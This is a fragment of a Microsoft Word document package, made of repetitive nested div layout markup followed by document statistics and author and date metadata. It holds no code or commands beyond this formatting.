                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="724332051">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="636646767">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="743263080">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="1530993463">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="1459294845">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="102185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6418014">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="177696925">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1993286749">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="983316387">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1294360750">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1250430819">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                              </w:divsChild>
                            </w:div>
                            <w:div w:id="485442732">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="1087925209">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="688869033">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                              </w:divsChild>
                            </w:div>
                            <w:div w:id="2106924568">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="1029645509">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="576521706">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="42306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9559654">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1268082770">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1943880697">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1709179240">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1797260721">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1994404110">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="1400984613">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="1756781078">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1422219263">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="510417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1933</Words>
  <Characters>11019</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>91</Lines>
  <Paragraphs>25</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12927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daichizan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>daichizan</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-15T07:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-15T07:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>